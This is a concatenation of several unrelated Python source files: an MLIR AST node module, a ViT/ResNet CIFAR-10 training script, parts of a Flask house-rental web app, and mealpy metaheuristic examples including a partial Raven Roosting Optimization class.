def __init__(self, node: Union[Token, Node] = None, **fields):
index = 0
if isinstance(node, Node):
self.name = None
self.attributes = None
self.body = [node]
self.location = None
else:
if len(node) > index and isinstance(node[index], SymbolRefId):
self.name = node[index]
index += 1
else:
self.name = None
if len(node) > index and isinstance(node[index], AttributeDict):
self.attributes = node[index]
index += 1
else:
self.attributes = None
self.body = node[index].children
index += 1
if len(node) > index:
self.location = node[index]
else:
self.location = None
super().__init__(None, **fields)
def dump(self, indent=0) -> str:
result = indent * ' ' + 'module'
if self.name:
result += ' %s' % self.name.dump(indent)
if self.attributes:
result += ' attributes ' + dump_or_value(self.attributes, indent)
result += ' {\n'
result += '\n'.join(block.dump(indent + 1) for block in self.body)
result += '\n' + indent * ' ' + '}'
if self.location:
result += ' ' + self.location.dump(indent)
return result
class Function(Node):
_fields_ = [
'name', 'args', 'result_types', 'attributes', 'body', 'location'
]
def __init__(self, node: Token = None, **fields):
signature = node[0].children
# Parse signature
index = 0
self.name = signature[index]
index += 1
if len(signature) > index and signature[index].data == 'argument_list':
self.args = signature[index].children
index += 1
else:
self.args = []
if (len(signature) > index
and signature[index].data == 'function_result_list'):
self.result_types = signature[index].children
index += 1
else:
self.result_types = []
# Parse rest of function
index = 1
if len(node) > index and isinstance(node[index], AttributeDict):
self.attributes = node[index]
index += 1
else:
self.attributes = None
if len(node) > index and isinstance(node[index], Region):
self.body = node[index]
index += 1
else:
self.body = []
if len(node) > index:
self.location = node[index]
else:
self.location = None
super().__init__(None, **fields)
def dump(self, indent=0) -> str:
result = indent * ' ' + 'func'
result += ' %s' % self.name.dump(indent)
result += '(%s)' % ', '.join(
dump_or_value(arg, indent) for arg in self.args)
if self.result_types:
if len(self.result_types) == 1:
result += ' -> ' + dump_or_value(self.result_types[0], indent)
else:
result += ' -> (%s)' % ', '.join(
dump_or_value(res, indent) for res in self.result_types)
if self.attributes:
result += ' attributes ' + dump_or_value(self.attributes, indent)
result += ' %s' % (self.body.dump(indent) if self.body else '{\n%s}' %
(indent * ' '))
if self.location:
result += ' ' + self.location.dump(indent)
return result
class Region(Node):
_fields_ = ['body']
def __init__(self, node: Token = None, **fields):
self.body = node
super().__init__(None, **fields)
def dump(self, indent=0) -> str:
return ('{\n' + '\n'.join(
block.dump(indent + 1)
for block in self.body) + '\n%s}' % (indent * ' '))
class Block(Node):
_fields_ = ['label', 'body']
def __init__(self, node: Token = None, **fields):
index = 0
if len(node) > index and isinstance(node[index], BlockLabel):
self.label = node[index]
index += 1
else:
self.label = None
if len(node) > index:
self.body = node[index:]
else:
self.body = []
super().__init__(None, **fields)
def dump(self, indent=0) -> str:
result = ''
if self.label:
result += indent * ' ' + self.label.dump(indent)
result += '\n'.join(
indent * ' ' + stmt.dump(indent) for stmt in self.body)
return result
class BlockLabel(Node):
_fields_ = ['name', 'args']
def __init__(self, node: Token = None, **fields):
self.name = node[0]
if len(node) > 1:
self.args = node[1]
else:
self.args = []
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = dump_or_value(self.name, indent)
if self.args:
result += ' (%s)' % (', '.join(
dump_or_value(arg, indent) for arg in self.args))
result += ':\n'
return result
class NamedArgument(Node):
_fields_ = ['name', 'type', 'attributes']
def __init__(self, node: Token = None, **fields):
self.name = node[0]
self.type = node[1]
self.attributes = node[2] if len(node) > 2 else None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = '%s: %s' % (dump_or_value(self.name, indent),
dump_or_value(self.type, indent))
if self.attributes:
result += ' %s' % dump_or_value(self.attributes, indent)
return result
##############################################################################
# Affine and semi-affine expressions
# Types of affine expressions
class AffineExpr(Node):
_fields_ = ['value']
def dump(self, indent: int = 0) -> str:
return dump_or_value(self.value, indent)
class SemiAffineExpr(Node):
_fields_ = ['value']
def dump(self, indent: int = 0) -> str:
return dump_or_value(self.value, indent)
class MultiDimAffineExpr(Node):
_fields_ = ['dims']
def __init__(self, node: Token = None, **fields):
if len(node) == 1 and isinstance(node[0], list):
self.dims = node[0]
else:
self.dims = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '%s : (%s)' % (dump_or_value(self.dims_and_symbols, indent),
dump_or_value(self.constraints, indent))
def dump(self, indent: int = 0) -> str:
return '(%s)' % dump_or_value(self.dims, indent)
class MultiDimSemiAffineExpr(Node):
_fields_ = ['dims']
def __init__(self, node: Token = None, **fields):
if len(node) == 1 and isinstance(node[0], list):
self.dims = node[0]
else:
self.dims = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '(%s)' % dump_or_value(self.dims, indent)
# Contents of single/multi-dimensional (semi-)affine expressions
class AffineUnaryOp(Node):
_fields_ = ['operand']
_op_ = '<UNDEF %s>'
def dump(self, indent: int = 0) -> str:
return self._op_ % dump_or_value(self.operand, indent)
class AffineBinaryOp(Node):
_fields_ = ['operand_a', 'operand_b']
_op_ = '<UNDEF>'
def dump(self, indent: int = 0) -> str:
return '%s %s %s' % (dump_or_value(self.operand_a, indent), self._op_,
dump_or_value(self.operand_b, indent))
class AffineNeg(AffineUnaryOp): _op_ = '-%s'
class AffineParens(AffineUnaryOp): _op_ = '(%s)'
class AffineExplicitSymbol(AffineUnaryOp): _op_ = 'symbol(%s)'
class AffineAdd(AffineBinaryOp): _op_ = '+'
class AffineSub(AffineBinaryOp): _op_ = '-'
class AffineMul(AffineBinaryOp): _op_ = '*'
class AffineFloorDiv(AffineBinaryOp): _op_ = 'floordiv'
class AffineCeilDiv(AffineBinaryOp): _op_ = 'ceildiv'
class AffineMod(AffineBinaryOp): _op_ = 'mod'
##############################################################################
# (semi-)Affine maps, and integer sets
class DimAndSymbolList(Node):
_fields_ = ['dims', 'symbols']
def __init__(self, node: Token = None, **fields):
index = 0
if len(node) > index:
self.dims = node[index]
index += 1
else:
self.dims = []
if len(node) > index:
self.symbols = node[index]
index += 1
else:
self.symbols = []
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
if len(self.symbols) > 0:
return '(%s)[%s]' % (dump_or_value(self.dims, indent),
dump_or_value(self.symbols, indent))
return '(%s)' % dump_or_value(self.dims, indent)
class AffineConstraint(Node):
_fields_ = ['expr']
class AffineConstraintGreaterEqual(AffineConstraint):
def dump(self, indent: int = 0) -> str:
return '%s >= 0' % dump_or_value(self.expr, indent)
class AffineConstraintEqual(AffineConstraint):
def dump(self, indent: int = 0) -> str:
return '%s == 0' % dump_or_value(self.expr, indent)
class AffineMap(Node):
_fields_ = ['dims_and_symbols', 'map']
def dump(self, indent: int = 0) -> str:
return '%s -> %s' % (dump_or_value(self.dims_and_symbols, indent),
dump_or_value(self.map, indent))
class SemiAffineMap(Node):
_fields_ = ['dims_and_symbols', 'map']
def dump(self, indent: int = 0) -> str:
return '%s -> %s' % (dump_or_value(self.dims_and_symbols, indent),
dump_or_value(self.map, indent))
class IntSet(Node):
_fields_ = ['dims_and_symbols', 'constraints']
def __init__(self, node: Token = None, **fields):
index = 0
if len(node) > index:
self.dims_and_symbols = node[index]
index += 1
else:
self.dims_and_symbols = []
if len(node) > index:
self.constraints = node[index]
index += 1
else:
self.constraints = []
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '%s : (%s)' % (dump_or_value(self.dims_and_symbols, indent),
dump_or_value(self.constraints, indent))
##############################################################################
# Top-level definitions
class Definition(Node):
_fields_ = ['name', 'value']
def dump(self, indent: int = 0) -> str:
return (indent * ' ' + dump_or_value(self.name, indent) + ' = ' +
dump_or_value(self.value, indent))
class TypeAliasDef(Definition):
def dump(self, indent: int = 0) -> str:
return (indent * ' ' + dump_or_value(self.name, indent) + ' = type ' +
dump_or_value(self.value, indent))
class AttrAliasDef(Definition):
pass
class AffineMapDef(Definition):
pass
class SemiAffineMapDef(Definition):
pass
class IntSetDef(Definition):
pass
##############################################################################
# Helpers
def _dump_ast_or_value(value: Any, python=True, indent: int = 0) -> str:
""" Helper function to dump the AST node type or a reconstructible
node value.
:param python: Use Python syntax for output.
"""
if python and hasattr(value, 'dump_ast'):
return value.dump_ast()
if not python and hasattr(value, 'dump'):
return value.dump(indent=indent)
# Literals
if not python and isinstance(value, bool):
return 'true' if value else 'false'
if python and isinstance(value, str):
return '"%s"' % value
# Primitive types
if isinstance(value, list):
if not python:
return ', '.join(_dump_ast_or_value(v, python) for v in value)
return '[%s]' % ', '.join(_dump_ast_or_value(v, python) for v in value)
if isinstance(value, tuple):
return '(%s%s)' % (', '.join(
_dump_ast_or_value(v, python)
for v in value), ', ' if python else '')
if isinstance(value, dict):
sep = ': ' if python else ' = '
return '{%s}' % ', '.join(
'%s%s%s' %
(_dump_ast_or_value(k, python), sep, _dump_ast_or_value(v, python))
for k, v in value.items())
return str(value)
def dump_or_value(value: Any, indent: int = 0) -> str:
""" Helper function to dump the MLIR value or a reconstructible
node value. """
return _dump_ast_or_value(value, python=False, indent=indent)
``` |
{
"source": "Jokererer/VIT-ResNet-CIFAR10",
"score": 2
} |
#### File: Jokererer/VIT-ResNet-CIFAR10/train_cifar10.py
```python
from __future__ import print_function
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import numpy as np
from da import CutMix, MixUp
import torchvision
import torchvision.transforms as transforms
import os
import argparse
import pandas as pd
import csv
import time
from models import *
from models.vit import ViT
from utils import progress_bar
from models.convmixer import ConvMixer
from randomaug import RandAugment
from torch.optim import lr_scheduler
from cross_entropy import LabelSmoothingCrossEntropy
from schedular import WarmupCosineSchedule
from torch.optim.lr_scheduler import _LRScheduler
torch.cuda.empty_cache()
#learning_rate = 3e-2 # The initial learning rate for SGD
#learning_rate = 1e-4 # The initial learning rate for Adam
# parsers
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--lr', default=1e-4, type=float, help='learning rate') # resnets.. 1e-3, Vit..1e-4?
parser.add_argument('--opt', default="sgd")
parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
parser.add_argument('--aug', action='store_true', help='use randomaug')
parser.add_argument('--amp', action='store_true', help='enable AMP training')
#parser.add_argument('--mixup', action='store_true', help='add mixup augumentations')
parser.add_argument('--net', default='vit')
parser.add_argument('--bs', default='64')
parser.add_argument('--n_epochs', type=int, default='200')
parser.add_argument("--img_size", default=224, type=int, help="Resolution size")
parser.add_argument('--patch', default='32', type=int)
parser.add_argument('--alpha', default=1., type=float,
help='mixup interpolation coefficient (default: 1)')
parser.add_argument('--convkernel', default='8', type=int)
# parser.add_argument("--cutmix", action="store_true")
# parser.add_argument("--mixup", action="store_true")
parser.add_argument('--cos', action='store_true', help='Train with cosine annealing scheduling')
args = parser.parse_args()
# take in args
import wandb
watermark = "{}_lr{}".format(args.net, args.lr)
if args.amp:
watermark += "_useamp"
wandb.init(project="Vit-CIFAR10-224-PATCH",
name=watermark)
wandb.config.update(args)
# if args.aug:
# import albumentations
bs = int(args.bs)
use_amp = args.amp
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
best_acc = 0 # best test accuracy
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
# Data
print('==> Preparing data..')
if args.net == "vit_timm":
size = 384
else:
size = 32
# transform_train = transforms.Compose([
# transforms.RandomCrop(32, padding=4),
# transforms.Resize(size),
# transforms.RandomHorizontalFlip(),
# transforms.ToTensor(),
# transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
# ])
#
# transform_test = transforms.Compose([
# transforms.Resize(size),
# transforms.ToTensor(),
# transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
# ])
#transforms.ToTensor(),
#transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])])
transform_train = transforms.Compose([transforms.RandomResizedCrop(224),
transforms.RandomVerticalFlip(p = 0.5),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
]
)
transform_test = transforms.Compose([ transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
]
)
# transform_train = transforms.Compose([
# transforms.RandomResizedCrop((args.img_size, args.img_size), scale=(0.05, 1.0)),
# transforms.ToTensor(),
# transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),
# ])
# transform_test = transforms.Compose([
# transforms.Resize((args.img_size, args.img_size)),
# transforms.ToTensor(),
# transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),
# ])
# Add RandAugment with N, M(hyperparameter)
if args.aug:
N = 2;
M = 14;
transform_train.transforms.insert(0, RandAugment(N, M))
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=bs, shuffle=True, num_workers=8)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=bs, shuffle=False, num_workers=8)
# trainset = torchvision.datasets.ImageNet('./data/ImageNet/train', transform=transform_train)
# trainloader = torch.utils.data.DataLoader(trainset, batch_size=bs, shuffle=True, num_workers=8)
#
# testset = torchvision.datasets.ImageNet('./data/ImageNet/val',transform=transform_test)
# testloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=8)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
# Model
print('==> Building model..')
# net = VGG('VGG19')
if args.net == 'res18':
net = ResNet18()
elif args.net == 'vgg':
net = VGG('VGG19')
elif args.net == 'res34':
net = ResNet34()
elif args.net == 'res50':
net = ResNet50()
elif args.net == 'res101':
net = ResNet101()
elif args.net == "convmixer":
# from paper, accuracy >96%. you can tune the depth and dim to scale accuracy and speed.
net = ConvMixer(256, 16, kernel_size=args.convkernel, patch_size=1, n_classes=10)
elif args.net == "vit":
# ViT for cifar10
net = ViT(
image_size=224,
patch_size=args.patch,
num_classes=10,
dim=768,
depth=12,
heads=12,
mlp_dim=3072,
dropout=0.1,
emb_dropout=0.1
)
elif args.net == "vit_timm":
import timm
net = timm.create_model("vit_large_patch16_384", pretrained=True)
net.head = nn.Linear(net.head.in_features, 10)
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net) # make parallel
cudnn.benchmark = True
if args.resume:
# Load checkpoint.
print('==> Resuming from checkpoint..')
assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'
checkpoint = torch.load('./checkpoint/{}-ckpt.t7'.format(args.net))
net.load_state_dict(checkpoint['net'])
best_acc = checkpoint['acc']
start_epoch = checkpoint['epoch']
# Loss is CE
criterion = nn.CrossEntropyLoss()
# criterion = LabelSmoothingCrossEntropy()
if args.opt == "adam":
optimizer = optim.Adam(net.parameters(), lr=args.lr)
elif args.opt == "sgd":
optimizer = torch.optim.SGD(net.parameters(),
lr=args.lr,
momentum=0.9,
weight_decay=1e-4)
# optimizer = optim.SGD(net.parameters(), lr=args.lr)
#optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)
# class WarmUpLR(_LRScheduler):
# """warmup_training learning rate scheduler
# Args:
# optimizer: optimzier(e.g. SGD)
# total_iters: totoal_iters of warmup phase
# """
#
# def __init__(self, optimizer, total_iters, last_epoch=-1):
# self.total_iters = total_iters
# super().__init__(optimizer, last_epoch)
#
# def get_lr(self):
# """we will use the first m batches, and set the learning
# rate to base_lr * m / total_iters
# """
# return [base_lr * self.last_epoch / (self.total_iters + 1e-8) for base_lr in self.base_lrs]
# use cosine or reduce LR on Plateau scheduling
if args.cos:
# scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, args.n_epochs)
scheduler = WarmupCosineSchedule(optimizer, warmup_steps=100, t_total=10000)
else:
scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, 'min', patience=3, verbose=True, min_lr=1e-3 * 1e-5,
factor=0.1)
# warmup_epoch = 5
# scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, 100 - warmup_epoch)
#
# iter_per_epoch = len(trainset)
# warmup_scheduler = WarmUpLR(optimizer, iter_per_epoch * warmup_epoch)
if args.cos:
wandb.config.scheduler = "cosine"
else:
wandb.config.scheduler = "ReduceLROnPlateau"
#wandb.config.scheduler = "cosine"
##### Training
# scaler = torch.cuda.amp.GradScaler(enabled=use_amp)
gradient_accumulation_steps = 1
def mixup_data(x, y, alpha=1.0, use_cuda=True):
'''Returns mixed inputs, pairs of targets, and lambda'''
if alpha > 0:
lam = np.random.beta(alpha, alpha)
else:
lam = 1
batch_size = x.size()[0]
if use_cuda:
index = torch.randperm(batch_size).cuda()
else:
index = torch.randperm(batch_size)
mixed_x = lam * x + (1 - lam) * x[index, :]
y_a, y_b = y, y[index]
return mixed_x, y_a, y_b, lam
def mixup_criterion(criterion, pred, y_a, y_b, lam):
return lam * criterion(pred, y_a) + (1 - lam) * criterion(pred, y_b)
use_cuda = torch.cuda.is_available()
def train(epoch):
print('\nEpoch: %d' % epoch)
net.train()
train_loss = 0
correct = 0
total = 0
train_step = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
# if epoch < 5:
# warmup_scheduler.step()
# warm_lr = warmup_scheduler.get_lr()
# print("warm_lr:%s" % warm_lr)
inputs, targets = inputs.to(device), targets.to(device)
inputs, targets_a, targets_b, lam = mixup_data(inputs, targets,
args.alpha, use_cuda)
inputs, targets_a, targets_b = map(Variable, (inputs,
targets_a, targets_b))
outputs = net(inputs)
loss = mixup_criterion(criterion, outputs, targets_a, targets_b, lam)
#loss = criterion(outputs, targets)
# if gradient_accumulation_steps > 1:
# loss = loss / gradient_accumulation_steps
# Train with amp
loss.backward()
# with torch.cuda.amp.autocast(enabled=use_amp):
# if (batch_idx + 1) % gradient_accumulation_steps == 0:
scheduler.step()
optimizer.step()
optimizer.zero_grad()
# scaler.scale(loss).backward()
# scaler.step(optimizer)
# scaler.update()
# train_loss += loss.item()
# _, predicted = outputs.max(1)
# total += targets.size(0)
# correct += predicted.eq(targets).sum().item()
# train_step = train_step + 1
train_loss += loss.item()
_, predicted = torch.max(outputs.data, 1)
total += targets.size(0)
correct += (lam * predicted.eq(targets_a.data).sum().item()
+ (1 - lam) * predicted.eq(targets_b.data).sum().item())
train_step = train_step + 1
progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss / (batch_idx + 1), 100. * correct / total, correct, total))
return train_loss / (batch_idx + 1), 100. * correct / total, train_step
##### Validation
def test(epoch):
global best_acc
net.eval()
test_loss = 0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
outputs = net(inputs)
loss = criterion(outputs, targets)
test_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (test_loss / (batch_idx + 1), 100. * correct / total, correct, total))
# # # # Update scheduler
# if not args.cos:
# scheduler.step(test_loss)
# Save checkpoint.
acc = 100. * correct / total
if acc > best_acc:
print('Saving..')
state = {"model": net.state_dict(),
"optimizer": optimizer.state_dict(),
"scaler": scheduler.state_dict()}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
torch.save(state, './checkpoint/' + args.net + '-{}2-ckpt.pth'.format(args.patch))
best_acc = acc
os.makedirs("log", exist_ok=True)
content = time.ctime() + ' ' + f'Epoch {epoch}, lr: {optimizer.param_groups[0]["lr"]:.7f}, val loss: {test_loss:.5f}, acc: {(acc):.5f}'
print(content)
with open(f'log/log_{args.net}_patch{args.patch}.txt', 'a') as appender:
appender.write(content + "\n")
return test_loss / (batch_idx + 1), acc
def main():
train_losses = []
test_losses = []
train_accs = []
test_accs = []
# 记录总训练次数
steps = 0
wandb.watch(net)
start_time = time.time()
# learn_rate = 0.
for epoch in range(start_epoch, args.n_epochs):
start = time.time()
# if epoch >= warmup_epoch:
# scheduler.step()
# learn_rate = scheduler.get_lr()[0]
train_loss, train_acc, train_step = train(epoch)
steps = steps + train_step
val_loss, acc = test(epoch)
if args.cos:
scheduler.step(epoch - 1)
train_accs.append(train_acc)
train_losses.append(train_loss)
test_accs.append(acc)
test_losses.append(val_loss)
#optimizer.param_groups[0]["lr"]
# Log training..
wandb.log({'epoch': epoch, 'train_loss': train_loss, 'train_acc ': train_acc, 'val_loss': val_loss, "val_acc": acc,
"lr": optimizer.param_groups[0]["lr"],
"epoch_time": time.time() - start, "steps": steps})
print(
f"Epoch : {epoch} - train_acc: {train_acc:.4f} - train_loss : {train_loss:.4f} -test acc: {acc:.4f} - test loss : {val_loss:.4f} -steps:{steps}\n")
# Write out csv..
with open(f'log/log_{args.net}_patch{args.patch}.csv', 'w') as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerow(train_losses)
writer.writerow(train_accs)
writer.writerow(test_losses)
writer.writerow(test_accs)
print('ALL Time', time.time() - start_time)
print('ALL steps:', steps)
print(train_accs)
print(test_accs)
print(train_losses)
print(test_losses)
# writeout wandb
wandb.save("wandb_{}.h5".format(args.net))
if __name__ == '__main__':
main()
``` |
{
"source": "JokerHai/ihome",
"score": 2
} |
#### File: api/v1/search.py
```python
from flask import render_template, jsonify, request, current_app
from flask_login import current_user
from app.common.response_code import RET
from ...common import constants
from app.models import House
from ..v1 import api
@api.route('/search_view',methods = ['GET'])
def search_view():
return render_template('search/search.html')
@api.route('/houses_list',methods = ['GET'])
def houses_list():
try:
# 分页
page = request.args.get('page', 1, type=int)
# 区域Id
aid = request.args.get('aid')
# 开始日期
sd = request.args.get('sd')
# 结束日期
ed = request.args.get('ed')
# 排序
sk = request.args.get('sk')
filters = []
if aid :
filters.append(House.area_id == aid)
if sd :
filters.append(House.create_time >= sd)
if ed :
filters.append(House.create_time <= ed)
if sk == "booking":
order = House.order_count.desc()
elif sk == "price-inc":
order = House.price.asc()
elif sk == "price des":
order = House.price.desc()
else:
order = House.create_time.desc()
pagination = House.query.filter(*filters).order_by(order).paginate(
page,per_page = constants.HOME_POSTS_PER_PAGE,
error_out= False
)
houses = pagination.items
return jsonify(
status = RET.OK,
errmsg = "请求成功",
data = {
'houses':[house.to_basic_dict() for house in houses]
},
total_page = pagination.total
)
except Exception as e:
current_app.logger.error(e)
return jsonify(status=RET.DBERR, errmsg="程序异常,请联系管理员")
@api.route('/show_detail/<int:ids>',methods = ['GET'])
def show_detail(ids):
houses = House.query.get_or_404(ids)
data = {'house':houses.to_full_dict()}
return render_template('search/detail.html',data = data)
```
#### File: api/v1/users.py
```python
from flask_login import login_required, current_user
from ..v1 import api
from flask import render_template
@login_required
@api.route('/user_index',methods = ['GET','POST'])
def user_index():
data = current_user.to_dict()
return render_template('users/user_index.html',info = data)
```
#### File: app/auth/forms.py
```python
from flask_wtf import FlaskForm
from wtforms.validators import ValidationError
from ..models import User
class RegistrationForm(FlaskForm):
# register_mobile = StringField(_name = 'abc',validators=[
# DataRequired(),length(1,11),
# Regexp('1[3-9]\d{9}',0,
# 'mobile must have number underscores'
# )])
# password = PasswordField('password',validators=[
# DataRequired(),length(6,12)
# ])
# submit = SubmitField('register')
@staticmethod
def validate_mobile(field):
if User.query.filter_by(username=field.data).first():
raise ValidationError('mobile already in use.')
```
#### File: app/common/common.py
```python
from functools import wraps
from flask import session, current_app, g
import re
# 效验手机号
from flask import current_app
from flask import g
from flask import session
from functools import wraps
def check_mobile(mobile):
if mobile is not None:
if re.match("1[3-9]\d{9}", mobile) is not None:
return True
else:
return False
else:
return False
#定义登陆装饰器,封装用户的登陆数据
def user_login_data(view_func):
@wraps(view_func)
def wrapper(*args,**kwargs):
# 1.从session中取出用户的user_id
user_id = session.get("user_id")
# 2通过user_id取出用户对象
user = None
if user_id:
try:
from app.models import User
user = User.query.get(user_id)
except Exception as e:
current_app.logger.error(e)
#3.将user数据封装到g对象
g.user = user
return view_func(*args,**kwargs)
return wrapper
# 定义登录装饰器,封装用户的登录数据
def user_login_data(view_func):
@wraps(view_func)
def wrapper(*args, **kwargs):
# 1.从session中取出用户的user_id
user_id = session.get("user_id")
user = None
if user_id:
# 2.通过user_id取出用户对象
try:
from app.models import User
user = User.query.get(user_id)
except Exception as e:
current_app.logger.error(e)
# 3.将user数据封装到g对象
g.user = user
return view_func(*args, **kwargs)
return wrapper
```
#### File: app/main/views.py
```python
from flask import render_template
from flask_login import current_user
from ..main import main
@main.route('/',methods = ['GET'])
def index():
print(current_user.is_authenticated)
return render_template("site/index.html")
```
#### File: JokerHai/ihome/manage.py
```python
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager, Shell
from app import create_app, db, models
from app.models import User,Area,House,Facility,HouseImage, Order
app = create_app('default')
manager = Manager(app)
migrate = Migrate(app, db)
def make_shell_context():
return dict(app=app, db=db,
User=User,Area=Area,
House=House,Facility=Facility,
HouseImage=HouseImage,
Order=Order
)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
``` |
{
"source": "JokerHB/mealpy",
"score": 3
} |
#### File: utils/visualize/exploration_exploitation_chart.py
```python
from mealpy.evolutionary_based.GA import BaseGA
from mealpy.utils.visualize import *
from numpy import sum, mean, sqrt
## Define your own fitness function
# Multi-objective but single fitness/target value. By using weighting method to convert from multiple objectives to single target
def obj_function(solution):
f1 = (sum(solution ** 2) - mean(solution)) / len(solution)
f2 = sum(sqrt(abs(solution)))
f3 = sum(mean(solution ** 2) - solution)
return [f1, f2, f3]
## Setting parameters
verbose = True
epoch = 100
pop_size = 50
lb1 = [-10, -5, -15, -20, -10, -15, -10, -30]
ub1 = [10, 5, 15, 20, 50, 30, 100, 85]
optimizer = BaseGA(obj_function, lb1, ub1, "min", verbose, epoch, pop_size, obj_weight=[0.2, 0.5, 0.3])
best_position, best_fitness, g_best_fit_list, c_best_fit_list = optimizer.train()
print(best_position)
## On the exploration and exploitation in popular swarm-based metaheuristic algorithms (the idea come from this paper)
# This exploration/exploitation chart should draws for single algorithm and single fitness function
export_explore_exploit_chart([optimizer.history_list_explore, optimizer.history_list_exploit]) # Draw exploration and exploitation chart
# Parameter for this function
# data: is the list of array
# + optimizer.history_list_explore -> List of exploration percentages
# + optimizer.history_list_exploit -> List of exploitation percentages
# title: title of the figure
# list_legends: list of line's name, default = ("Exploration %", "Exploitation %")
# list_styles: matplotlib API, default = ('-', '-')
# list_colors: matplotlib API, default = ('blue', 'orange')
# x_label: string, default = "#Iteration"
# y_label: string, default = "Percentage"
# filename: string, default = "explore_exploit_chart"
# exts: matplotlib API, default = (".png", ".pdf") --> save figure in format of png and pdf
# verbose: show the figure on Python IDE, default = True
# This diversity chart should draws for multiple algorithms for a single fitness function at the same time to compare the diversity spreading
export_diversity_chart([optimizer.history_list_div], list_legends=['GA']) # Draw diversity measurement chart
# Parameter for this function
# data: is the list of array
# + optimizer1.history_list_div -> List of diversity spreading for this optimizer1
# + optimizer2.history_list_div -> List of diversity spreading for this optimizer1
# title: title of the figure
# list_legends: list, e.g. ("GA", "PSO",..)
# list_styles: matplotlib API, default = None
# list_colors: matplotlib API, default = None
# x_label: string, default = "#Iteration"
# y_label: string, default = "Diversity Measurement"
# filename: string, default = "diversity_chart"
# exts: matplotlib API, default = (".png", ".pdf") --> save figure in format of png and pdf
# verbose: show the figure on Python IDE, default = True
```
#### File: mealpy/dummy/RRO.py
```python
from numpy.random import uniform, rand, choice
from numpy import zeros, power
from copy import deepcopy
from mealpy.optimizer import Root
class OriginalRRO(Root):
"""
The original version of: Raven Roosting Optimization (RRO)
Link:
https://doi.org/10.1007/s00500-014-1520-5
Questions:
1. How to set the value of R? I guess R = (UB - LB) / 2
2. How to handle the case raven fly outside of radius? I guess redo the fly from previous position.
3. How to select Perception Follower? I guess randomly selected
4. The Pseudo-code is wrong, 100%. After each iteration, create N random locations. For real?
5. The sentence "There is a Prob_stop chance the raven will stop". What is Prob_stop. Not mention?
6. The whole paper contains only simple equation: x(t) = x(t-1) + d. Really?
Conclusion:
The algorithm can't even converge for a simple problem (sphere function).
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
r_perception=3.6, r_leader=3.6, n_steps=20, weak_percent=0.4, prob_stop=0.2, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
self.r_perception = r_perception # Default: [1.8, 3.6], Factor that control the radius of perception
self.r_leader = r_leader # Default: [1.8, 3.6], Factor that control the radius of leader
self.n_steps = n_steps # Default: [5, 10, 20], Number of moving steps of each raven towards the best solution
self.weak_percent = weak_percent # Default: [0,2, 0.4, 0.6] Percentage of population will be moved towards by global best solution
self.prob_stop = prob_stop # The probability of stopping the fly
def train(self):
r_percept = ((self.ub - self.lb)/ 2) / (self.r_perception * power(self.pop_size, 1.0 / self.problem_size))
r_leader = ((self.ub - self.lb) / 2) / (self.r_leader * power(self.pop_size, 1.0 / self.problem_size))
n_ravens = int(self.weak_percent * self.pop_size)
pop = [self.create_solution() for _ in range(self.pop_size)]
pop_local = deepcopy(pop)
g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
for epoch in range(self.epoch):
# Select the random raven to fly to global best by r_leader
idx_list = choice(range(0, self.pop_size), n_ravens, replace=False)
for i in range(self.pop_size):
if i in idx_list: # Fly to global best
step = 0
while step < self.n_steps:
d_random = uniform(zeros(self.problem_size), r_leader, self.problem_size)
pos_new = pop[i][self.ID_POS] + d_random
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
